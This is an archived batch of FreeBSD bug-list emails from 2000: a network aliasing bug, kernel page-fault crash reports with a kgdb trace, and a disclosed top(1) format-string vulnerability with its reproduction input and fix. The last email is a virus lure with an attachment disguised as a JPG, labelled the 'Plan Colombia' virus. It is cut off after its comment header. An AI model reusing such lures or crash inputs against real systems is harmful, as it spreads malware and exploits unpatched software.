FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/22210: typeof(passwd->pw_gid) != typeof(group->gr_gid) Date: Wed, 1 Nov 2000 23:20:05 +0100 (CET) Garrett Wollman wrote: > < said: > > > the type of the gr_gid member of struct group doesn't match > > the type of the pw_gid member of struct passwd which prevent > > a simple comparison such as passwd->pw_gid == group->gr_gid > > w/o a compiler warning. > > This will be fixed in my giant POSIX-draft header patch which will hit > the tree some time next month. I've just found things which may interrest you. those things seems to be UNIX 98 certification suite located at : http://www.opengroup.org/testing/downloads.html specially, VSX-PCTS and System Header Checker. also, UNIX 98 specifications may be found here : http://www.opengroup.org/onlinepubs/7908799/ see you. Cyrille. -- home: mailto:clefevre@citeweb.net work: mailto:Cyrille.Lefevre@edf.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 15:20:11 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D56CC37B4E5 for ; Wed, 1 Nov 2000 15:20:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA75177; Wed, 1 Nov 2000 15:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id ADCEC37B4C5 for ; Wed, 1 Nov 2000 15:19:19 -0800 (PST) Received: from ca-1.enteract.com (ca-1.enteract.com [207.229.143.13]) by mail.enteract.com (8.9.3/8.9.3) with ESMTP id RAA38876 for ; Wed, 1 Nov 2000 17:19:18 -0600 (CST) (envelope-from ryanb@ca-1.enteract.com) Received: (from ryanb@localhost) by ca-1.enteract.com (8.11.1/8.9.3) id eA1NJHY34630; Wed, 1 Nov 2000 17:19:17 -0600 (CST) (envelope-from ryanb) Message-Id: <200011012319.eA1NJHY34630@ca-1.enteract.com> Date: Wed, 1 Nov 2000 17:19:17 -0600 (CST) From: R Beasley Reply-To: ryanb@enteract.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/22489: mass-aliasing of IPs to dc0 via ifconfig is unhappy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22489 >Category: bin >Synopsis: mass IP aliasing via ifconfig broken >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 01 15:20:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: R Beasley >Release: FreeBSD 4.2-BETA i386 >Organization: >Environment: Copyright (c) 1992-2000 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.2-BETA #0: Wed Nov 1 11:04:13 CST 2000 root@:/usr/obj/usr/src/sys/CA1 Timecounter "i8254" frequency 1193182 Hz CPU: Pentium II/Pentium II Xeon/Celeron (451.03-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x652 Stepping = 2 Features=0x183fbff real memory = 536858624 (524276K bytes) avail memory = 519471104 (507296K bytes) Programming 24 pins in IOAPIC #0 IOAPIC #0 intpin 2 -> irq 0 IOAPIC #0 intpin 17 -> irq 11 IOAPIC #0 intpin 18 -> irq 10 IOAPIC #0 intpin 19 -> irq 12 FreeBSD/SMP: Multiprocessor motherboard cpu0 (BSP): apic id: 1, version: 0x00040011, at 0xfee00000 cpu1 (AP): apic id: 0, version: 0x00040011, at 0xfee00000 io0 (APIC): apic id: 2, version: 0x00170011, at 0xfec00000 Preloaded elf kernel "kernel" at 0xc02cc000. Preloaded userconfig_script "/boot/kernel.conf" at 0xc02cc09c. Pentium Pro MTRR support enabled npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 pcib1: at device 1.0 on pci0 pci1: on pcib1 isab0: at device 4.0 on pci0 isa0: on isab0 pci0: at 4.1 pci0: at 4.2 irq 12 Timecounter "PIIX" frequency 3579545 Hz p1: port 0xe800-0xe80f at device 4.3 on pci0 ahc0: port 0xd000-0xd0ff mem 0xe3000000 -0xe3000fff irq 12 at device 6.0 on pci0 aic7890/91: Wide Channel A, SCSI Id=7, 32/255 SCBs dc0: <82c169 PNIC 10/100BaseTX> port 0xb800-0xb8ff mem 0xe2800000-0xe28000ff irq 12 at device 9.0 on pci0 dc0: Ethernet address: 00:a0:cc:39:eb:0a miibus0: on dc0 ukphy0: on miibus0 ukphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto dc1: <82c169 PNIC 10/100BaseTX> port 0xb400-0xb4ff mem 0xe2000000-0xe20000ff irq 10 at device 10.0 on pci0 dc1: Ethernet address: 00:a0:cc:39:eb:0e miibus1: on dc1 ukphy1: on miibus1 ukphy1: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto pci0: at 11.0 irq 11 atkbdc0: at port 0x60,0x64 on isa0 atkbd0: irq 1 on atkbdc0 vga0: at port 0x3c0-0x3df iomem 0xa0000-0xbffff on isa0 sc0: on isa0 sc0: VGA <8 virtual consoles, flags=0x200> fdc0: at port 0x3f0-0x3f5,0x3f7 irq 6 drq 2 on isa0 io0 at port 0x3f8-0x3ff irq 4 flags 0x10 on isa0 sio0: type 16550A APIC_IO: Testing 8254 interrupt delivery APIC_IO: routing 8254 via IOAPIC #0 intpin 2 Waiting 2 seconds for SCSI devices to settle SMP: AP CPU #1 Launched! - and - FreeBSD testbed.enteract.com 4.1.1-STABLE FreeBSD 4.1.1-STABLE #0: Thu Oct 26 21:48:10 CDT 2000 root@testbed.enteract.com:/usr/src/sys/compile/TESTBED i386 (Duplicate dmesg info w/ exception of release.) > Description: (Note: This is my very first PR, so please bear with me. :) (I haven't tested w/ SMP disabled yet, also haven't tested w/ non-dc cards.) On this specific web server, there are over 700 IP addresses bound to one NIC. Previously, binding all as aliases by processing a flat text file w/o pacing between binds would leave all proper addreses bound as necessary. Currently, the same script/text file are in use. No error msgs are generated and `ifconfig -a` output appears as normal. The local machine may ping and transmit/recv to the bound addresses as expected. However, all outside machines are unable to communicate with the 100th or so address on. ARP cache flushes have been performed, etc, etc -- manually removing the alias and rebinding seems to fix. Also, pacing with at least a 0.75-1 second between binds seems to be OK as well. Example: file named "ips.ca-1" contains around 750 addresses in a text file like so: 207.134.2.21 139.83.24.76 207.229.127.6 216.80.193.224 (etc) [root@ca-1][~] $ for tmp in `cat ips.ca-1`; do ifconfig dc0 inet $tmp netmask 255.255.255.255 alias; done (IPs appear bound as expected. Addresses below only meant as examples.) [root@ca-1][~] $ ifconfig -a dc0: flags=8843 mtu 1500 inet 207.229.143.13 netmask 0xffffff00 broadcast 207.229.143.255 inet 207.134.2.21 netmask 0xffffffff broadcast 207.134.2.21 inet 139.83.24.76 netmask 0xffffffff broadcast 139.83.24.76 inet 207.229.127.6 netmask 0xffffffff broadcast 207.229.127.6 inet 216.80.193.224 netmask 0xffffffff broadcast 216.80.193.224 [etc etc -snip-] inet 193.28.82.99 netmask 0xffffffff broadcast 193.28.82.99 inet 84.38.19.32 netmask 0xffffffff broadcast 84.38.19.32 [ryanb@ca-1][~] $ ping 193.28.82.99 PING 193.28.82.99 (207.229.128.165): 56 data bytes 64 bytes from 193.28.82.99: icmp_seq=0 ttl=255 time=0.260 ms 64 bytes from 193.28.82.99: icmp_seq=1 ttl=255 time=0.048 ms 64 bytes from 193.28.82.99: icmp_seq=2 ttl=255 time=0.054 ms ^C --- 193.28.82.99 ping statistics --- 3 packets transmitted, 3 packets received, 0% packet loss round-trip min/avg/max/stddev = 0.048/0.121/0.260/0.099 ms [ryanb@bjorn][~] $ ping 207.229.143.13 PING 207.229.143.13 (207.229.143.13): 56 data bytes 64 bytes from 207.229.143.13: icmp_seq=0 ttl=255 time=0.310 ms 64 bytes from 207.229.143.13: icmp_seq=1 ttl=255 time=0.026 ms 64 bytes from 207.229.143.13: icmp_seq=2 ttl=255 time=0.024 ms [ryanb@bjorn][~] $ ping 193.28.82.99 PING 193.28.82.99 (216.80.6.226): 56 data bytes ^C --- 193.28.82.99 ping statistics --- 4 packets transmitted, 0 packets received, 100% packet loss (193.28.82.99 listed as [incomplete] in ARP table) >Description: >How-To-Repeat: 1) Get yourself a flat text file w/ a lot of addresses separated by newlines. 2) As root, execute the following lame-o script: #!/bin/sh for tmp in `cat `; do ifconfig inet $tmp netmask 255.255.255.255 alias; done IPs will appear as being properly bound, yet are truely unusable to the network outside of your machine. >Fix: The only work around I know of is pacing the act of boundin the IPs. ie: inserting a "sleep 1" in the above script, which then works fine. (In our situation, that drives the boot time to over 10 minutes.) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 16:52:34 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from mail.stic.gov.tw (mail.stic.gov.tw [192.83.171.75]) by hub.freebsd.org (Postfix) with ESMTP id 4A00337B479 for ; Wed, 1 Nov 2000 16:52:32 -0800 (PST) Received: from relcon (test.stic.gov.tw [192.83.171.9]) by mail.stic.gov.tw (8.10.1/8.10.1) with SMTP id eA20qMM97475; Thu, 2 Nov 2000 08:52:22 +0800 (CST) Message-ID: <001e01c04467$3e47d870$09ab53c0@relcon> From: "Biing Jong Lin" To: "Justin T. Gibbs" Cc: References: <200011011529.eA1FT2a60338@aslan.scsiguy.com> Subject: Re: kern/21831: kernel trap 12 crash in 4.1.1-STABLE Date: Thu, 2 Nov 2000 08:52:57 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello: Arr... I have cvsup-ed the kernel after I came back from BSDCon. and seems it works. Do you suggest to cvsup my system now ? FreeBSD camera 4.1.1-STABLE FreeBSD 4.1.1-STABLE #3: Mon Oct 23 13:14:42 GMT 2000 root@camera.stic.gov.tw:/usr/src/sys/compile/camera i386 I was to mail you today, last week is a terrible busy week. Thanks for your help, I think the PR is closed now. .Winggy. ----- Original Message ----- From: "Justin T. Gibbs" To: "Biing Jong Lin" Cc: Sent: Wednesday, November 01, 2000 11:29 PM Subject: Re: kern/21831: kernel trap 12 crash in 4.1.1-STABLE Can you tell me if your problem still exists with -stable as of today? -- Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 21:40:14 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 21D0F37B657 for ; Wed, 1 Nov 2000 21:40:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA43534; Wed, 1 Nov 2000 21:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A033D37B4CF; Wed, 1 Nov 2000 21:37:22 -0800 (PST) Message-Id: <20001102053722.A033D37B4CF@hub.freebsd.org> Date: Wed, 1 Nov 2000 21:37:22 -0800 (PST) From: rzubairov@snos.ru To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/22494: Fatal trap 12: page fault while in kernel mode. Point to syscall xl_newbuf. The same was and in the version 3.3 stable ! Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22494 >Category: kern >Synopsis: Fatal trap 12: page fault while in kernel mode. Point to syscall xl_newbuf. The same was and in the version 3.3 stable ! >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 01 21:40:00 PST 2000 >Closed-Date: >Last-Modified: >Originator: Ravil Zubairov >Release: FreeBSD v4.1 RELEASE >Organization: JSC "Salavatnefteorgsintez" >Environment: FreeBSD bug.snos.ru 4.1-RELEASE FreeBSD 4.1-RELEASE #0: Wed Nov 1 09:59:55 YEKT 2000 toor@bug.sno s.ru:/usr/src/sys/compile/bug.snos.ru i386 Hardware: HP Vectra VE8, PII 350 MHz, 128 MB RAM, 3GB HDD Ethernet 3Com, 3c905B-TX. >Description: ------------------------------------------------------------------ the config file of kernel ------------------------------------------------------------------ # # GENERIC -- Generic kernel configuration file for FreeBSD/i386 # # For more information on this file, please read the handbook section on # Kernel Configuration Files: # # http://www.FreeBSD.org/handbook/kernelconfig-config.html # # The handbook is also available locally in /usr/share/doc/handbook # if you've installed the doc distribution, otherwise always see the # FreeBSD World Wide Web server (http://www.FreeBSD.org/) for the # latest information. # # An exhaustive list of options and more detailed explanations of the # device lines is also present in the ./LINT configuration file. If you are # in doubt as to the purpose or necessity of a line, check first in LINT. # # $FreeBSD: src/sys/i386/conf/GENERIC,v 1.246.2.8 2000/07/20 02:51:02 msmith Exp $ machine i386 cpu I386_CPU cpu I486_CPU cpu I586_CPU cpu I686_CPU ident bug maxusers 100 makeoptions DEBUG=-g #Build kernel with gdb(1) debug symbols options MATH_EMULATE #Support for x87 emulation options INET #InterNETworking options INET6 #IPv6 communications protocols options FFS #Berkeley Fast Filesystem options FFS_ROOT #FFS usable as root device [keep this!] options SOFTUPDATES #Enable FFS soft updates support options MFS #Memory Filesystem options MD_ROOT #MD is a potential root device options NFS #Network Filesystem options NFS_ROOT #NFS usable as root device, NFS required options MSDOSFS #MSDOS Filesystem options CD9660 #ISO 9660 Filesystem options CD9660_ROOT #CD-ROM usable as root, CD9660 required options PROCFS #Process filesystem options COMPAT_43 #Compatible with BSD 4.3 [KEEP THIS!] options SCSI_DELAY=15000 #Delay (in ms) before probing SCSI options UCONSOLE #Allow users to grab the console options USERCONFIG #boot -c editor options VISUAL_USERCONFIG #visual boot -c editor options KTRACE #ktrace(1) support options SYSVSHM #SYSV-style shared memory options SYSVMSG #SYSV-style message queues options SYSVSEM #SYSV-style semaphores options P1003_1B #Posix P1003_1B real-time extensions options _KPOSIX_PRIORITY_SCHEDULING options ICMP_BANDLIM #Rate limit bad replies options KBD_INSTALL_CDEV # install a CDEV entry in /dev #Added by Zubairov R. 12.10.2000 options NMBCLUSTERS=8192 # To make an SMP kernel, the next two are needed #options SMP # Symmetric MultiProcessor Kernel #options APIC_IO # Symmetric (APIC) I/O # Optionally these may need tweaked, (defaults shown): #options NCPU=2 # number of CPUs #options NBUS=4 # number of busses #options NAPIC=1 # number of IO APICs #options NINTR=24 # number of INTs device isa device eisa device pci # Floppy drives device fdc0 at isa? port IO_FD1 irq 6 drq 2 device fd0 at fdc0 drive 0 device fd1 at fdc0 drive 1 # ATA and ATAPI devices device ata0 at isa? port IO_WD1 irq 14 device ata1 at isa? port IO_WD2 irq 15 device ata device atadisk # ATA disk drives device atapicd # ATAPI CDROM drives device atapifd # ATAPI floppy drives device atapist # ATAPI tape drives options ATA_STATIC_ID #Static device numbering #options ATA_ENABLE_ATAPI_DMA #Enable DMA on ATAPI devices # SCSI Controllers #device ahb # EISA AHA1742 family #device ahc # AHA2940 and onboard AIC7xxx devices #device amd # AMD 53C974 (Teckram DC-390(T)) #device dpt # DPT Smartcache - See LINT for options! #device isp # Qlogic family #device ncr # NCR/Symbios Logic #device sym # NCR/Symbios Logic (newer chipsets) #options SYM_SETUP_LP_PROBE_MAP=0x40 # Allow ncr to attach legacy NCR devices when # both sym and ncr are configured device adv0 at isa? device adw device bt0 at isa? device aha0 at isa? device aic0 at isa? # SCSI peripherals device scbus # SCSI bus (required) #device da # Direct Access (disks) #device sa # Sequential Access (tape etc) #device cd # CD #device pass # Passthrough device (direct SCSI access) # RAID controllers #device ida # Compaq Smart RAID #device amr # AMI MegaRAID #device mlx # Mylex DAC960 family #device twe # 3ware Escalade # atkbdc0 controls both the keyboard and the PS/2 mouse device atkbdc0 at isa? port IO_KBD device atkbd0 at atkbdc? irq 1 flags 0x1 device psm0 at atkbdc? irq 12 device vga0 at isa? # splash screen/screen saver # Remarked by Zubairov R. 01.11.2000 # pseudo-device splash # syscons is the default console driver, resembling an SCO console device sc0 at isa? flags 0x100 # Enable this and PCVT_FREEBSD for pcvt vt220 compatible console driver #device vt0 at isa? #options XSERVER # support for X server on a vt console #options FAT_CURSOR # start with block cursor # If you have a ThinkPAD, uncomment this along with the rest of the PCVT lines #options PCVT_SCANSET=2 # IBM keyboards are non-std # Floating point support - do not disable. device npx0 at nexus? port IO_NPX irq 13 # Power management support (see LINT for more options) device apm0 at nexus? disable flags 0x20 # Advanced Power Management # PCCARD (PCMCIA) support device card #device pcic0 at isa? irq 10 port 0x3e0 iomem 0xd0000 #device pcic1 at isa? irq 11 port 0x3e2 iomem 0xd4000 disable # Serial (COM) ports # device sio0 at isa? port IO_COM1 flags 0x10 irq 4 # device sio1 at isa? port IO_COM2 irq 3 # device sio2 at isa? disable port IO_COM3 irq 5 # device sio3 at isa? disable port IO_COM4 irq 9 # Parallel port # device ppc0 at isa? irq 7 # device ppbus # Parallel port bus (required) # device lpt # Printer # device plip # TCP/IP over parallel # device ppi # Parallel port interface device #device vpo # Requires scbus and da # PCI Ethernet NICs. #device de # DEC/Intel DC21x4x (``Tulip'') #device fxp # Intel EtherExpress PRO/100B (82557, 82558) #device tx # SMC 9432TX (83c170 ``EPIC'') #device vx # 3Com 3c590, 3c595 (``Vortex'') #device wx # Intel Gigabit Ethernet Card (``Wiseman'') # PCI Ethernet NICs that use the common MII bus controller code. device miibus # MII bus support #device dc # DEC/Intel 21143 and various workalikes #device rl # RealTek 8129/8139 #device sf # Adaptec AIC-6915 (``Starfire'') #device sis # Silicon Integrated Systems SiS 900/SiS 7016 #device ste # Sundance ST201 (D-Link DFE-550TX) #device tl # Texas Instruments ThunderLAN #device vr # VIA Rhine, Rhine II #device wb # Winbond W89C840F device xl # 3Com 3c90x (``Boomerang'', ``Cyclone'') # ISA Ethernet NICs. device ed0 at isa? port 0x280 irq 10 iomem 0xd8000 device ex device ep # WaveLAN/IEEE 802.11 wireless NICs. Note: the WaveLAN/IEEE really # exists only as a PCMCIA device, so there is no ISA attatement needed # and resources will always be dynamically assigned by the pccard code. device wi # Aironet 4500/4800 802.11 wireless NICs. Note: the declaration below will # work for PCMCIA and PCI cards, as well as ISA cards set to ISA PnP # mode (the factory default). If you set the switches on your ISA # card for a manually chosen I/O address and IRQ, you must specify # those paremeters here. device an # Xircom Ethernet #device xe # The probe order of these is presently determined by i386/isa/isa_compat.c. device ie0 at isa? port 0x300 irq 10 iomem 0xd0000 device fe0 at isa? port 0x300 device le0 at isa? port 0x300 irq 5 iomem 0xd0000 device lnc0 at isa? port 0x280 irq 10 drq 0 device cs0 at isa? port 0x300 device sn0 at isa? port 0x300 irq 10 # Pseudo devices - the number indicates how many units to allocated. pseudo-device loop # Network loopback pseudo-device ether # Ethernet support # pseudo-device sl 1 # Kernel SLIP # pseudo-device ppp 1 # Kernel PPP pseudo-device tun # Packet tunnel. pseudo-device pty # Pseudo-ttys (telnet etc) pseudo-device md # Memory "disks" pseudo-device gif 4 # IPv6 and IPv4 tunneling pseudo-device faith 1 # IPv6-to-IPv4 relaying (translation) # The `bpf' pseudo-device enables the Berkeley Packet Filter. # Be aware of the administrative consequences of enabling this! pseudo-device bpf #Berkeley packet filter # USB support # device uhci # UHCI PCI->USB interface # device ohci # OHCI PCI->USB interface # device usb # USB Bus (required) # device ugen # Generic # device uhid # "Human Interface Devices" # device ukbd # Keyboard # device ulpt # Printer # device umass # Disks/Mass storage - Requires scbus and da # device ums # Mouse # USB Ethernet, requires mii # device aue # ADMtek USB ethernet # device cue # CATC USB ethernet # device kue # Kawasaki LSI USB ethernet ------------------------------------------------------------------ end of config file ------------------------------------------------------------------ ------------------------------------------------------------------ This is the kgdb results ------------------------------------------------------------------ GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... IdlePTD 3485696 initial pcb at 2d0440 panicstr: page fault panic messages: --- Fatal trap 12: page fault while in kernel mode fault virtual address = 0xffff7800 fault code = supervisor read, page not present instruction pointer = 0x8:0xc02055fc stack pointer = 0x10:0xc02aee84 frame pointer = 0x10:0xc02aee90 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = Idle interrupt mask = net trap number = 12 panic: page fault syncing disks... 7 7 done Uptime: 23h16m2s dumping to dev #wd/1, offset 352256 dump ata0: resetting devices .. done 128 127 126 125 124 123 122 121 120 119 118 117 116 115 114 113 112 111 110 109 108 107 106 105 104 10 3 102 101 100 99 98 97 96 95 94 93 92 91 90 89 88 87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 7 0 69 68 67 66 65 64 63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 3 6 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 --- #0 boot (howto=256) at ../../kern/kern_shutdown.c:302 302 dumppcb.pcb_cr3 = rcr3(); (kgdb) where #0 boot (howto=256) at ../../kern/kern_shutdown.c:302 #1 0xc015a68c in poweroff_wait (junk=0xc02a5aaf, howto=0) at ../../kern/kern_shutdown.c:552 #2 0xc02608c5 in trap_fatal (frame=0xc02aee44, eva=4294932480) at ../../i386/i386/trap.c:927 #3 0xc026059d in trap_pfault (frame=0xc02aee44, usermode=0, eva=4294932480) at ../../i386/i386/trap.c:820 #4 0xc026016f in trap (frame={tf_fs = -1061355504, tf_es = -1040908272, tf_ds = -1066008560, tf_edi = -1062526720, tf_esi = 6686720, tf_ebp = -1070928240, tf_isp = -1070928272, tf_ebx = -1062526720, tf_edx = -1066102784, tf_ecx = -34816, tf_eax = 520535, tf_trapno = 12, tf_err = 0, tf_eip = -1071622660, tf_cs = 8, tf_eflags = 66054, tf_esp = -1040878384, tf_ss = -1061987584}) at ../../i386/i386/trap.c:426 #5 0xc02055fc in xl_newbuf (sc=0xc1f57000, c=0xc1f574d0) at ../../pci/if_xl.c:1651 #6 0xc02057c4 in xl_rxeof (sc=0xc1f57000) at ../../pci/if_xl.c:1752 #7 0xc0205e9c in xl_intr (arg=0xc1f57000) at ../../pci/if_xl.c:1971 (kgdb) up 5 #5 0xc02055fc in xl_newbuf (sc=0xc1f57000, c=0xc1f574d0) at ../../pci/if_xl.c:1651 1651 MCLGET(m_new, M_DONTWAIT); (kgdb) list 1646 printf("xl%d: no memory for rx list -- " 1647 "packet dropped!\n", sc->xl_unit); 1648 return(ENOBUFS); 1649 } 1650 1651 MCLGET(m_new, M_DONTWAIT); 1652 if (!(m_new->m_flags & M_EXT)) { 1653 printf("xl%d: no memory for rx list -- " 1654 "packet dropped!\n", sc->xl_unit); 1655 m_freem(m_new); (kgdb) quit -------------------------------------------------- end of kgdb -------------------------------------------------- >How-To-Repeat: In the host run the program for discover IP addreses and ARP addresses and Windows host names (samba)our network. Sometimes system crash ( ~ 1,2 times in week). >Fix: I do not know. This error was in my FreeBSD v3.3 stable (see the bugs Problem Report kern/20671 at 16 aug. 2000) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 23:10: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EFFCC37B479 for ; Wed, 1 Nov 2000 23:10:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA88243; Wed, 1 Nov 2000 23:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.117.178]) by hub.freebsd.org (Postfix) with SMTP id 7298437B4C5 for ; Wed, 1 Nov 2000 23:08:43 -0800 (PST) Received: (qmail 5860 invoked from network); 2 Nov 2000 07:08:43 -0000 Received: from unknown (HELO lagoon.freebsd.lublin.pl) (212.182.115.11) by 0 with SMTP; 2 Nov 2000 07:08:43 -0000 Received: (qmail 35852 invoked from network); 2 Nov 2000 07:09:35 -0000 Received: from unknown (HELO riget.scene.pl) (212.182.115.2) by 0 with SMTP; 2 Nov 2000 07:09:35 -0000 Received: (qmail 16163 invoked by uid 1001); 2 Nov 2000 07:08:27 -0000 Message-Id: <20001102070827.16162.qmail@riget.scene.pl> Date: 2 Nov 2000 07:08:27 -0000 From: venglin@freebsd.lublin.pl Reply-To: venglin@freebsd.lublin.pl To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/22496: [SECURITY] Yet another top(1) format string vulnerability Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22496 >Category: bin >Synopsis: [SECURITY] Yet another top(1) format string vulnerability >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 01 23:10:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Przemyslaw Frasunek >Release: FreeBSD 4.1.1-STABLE i386 >Organization: ISMEDIA >Environment: FreeBSD 4.1.1-STABLE as of 2 November 2000. >Description: Vulnerability very similar to FreeBSD-SA-00:62, just few lines below in top.c, but still not fixed. >How-To-Repeat: 1. Run top 2. Press 'r' 3. Type '20 %n' 4. Segfault >Fix: --- top.c.old Thu Nov 2 08:07:29 2000 +++ top.c Thu Nov 2 08:08:17 2000 @@ -826,7 +826,7 @@ { if ((errmsg = renice_procs(tempbuf2)) != NULL) { - new_message(MT_standout, errmsg); + new_message(MT_standout, "%s", errmsg); putchar('\r'); no_command = Yes; } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 23:39: 9 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from sunsite.aubi.de (mail.aubi-online.de [62.159.82.131]) by hub.freebsd.org (Postfix) with ESMTP id A95C537B4E5 for ; Wed, 1 Nov 2000 23:38:24 -0800 (PST) Received: from exchangeb.aubi.de (exchangeb.aubi.de [170.56.121.7]) by sunsite.aubi.de (8.9.3+Sun/8.9.3) with ESMTP id JAA23011 for ; Thu, 2 Nov 2000 09:38:23 +0200 (GMT) Received: by exchangeb.aubi.de with Internet Mail Service (5.5.2650.21) id ; Thu, 2 Nov 2000 09:34:40 -0000 Message-ID: <7B1EED0C5D58D411B73200508BDE77B204DD14@exchangeb.aubi.de> From: Peter Wagner To: FreeBSD Buglist Subject: US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.CO M)<= Date: Thu, 2 Nov 2000 09:34:38 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C044B0.1E6C22B0" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C044B0.1E6C22B0 Content-Type: text/plain VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.. ------_=_NextPart_000_01C044B0.1E6C22B0 Content-Type: application/octet-stream; name="DOMEO.JPG.vbs" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="DOMEO.JPG.vbs" rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D rem "Plan Colombia" virus v1.0 rem by Sand Ja9e Gr0w (www.colombia.com) rem Dedicated to all the people that want to be hackers or crackers, = in Colombia =20 rem This program is also a protest act against the violence and = corruption that Colombia lives... rem I always wanting that all this finishes, I have said... rem Santa fe de Bogot=E1 2000/09 rem I dedicate to all you the song "GoodBye" of Andreas Bochelli rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D rem 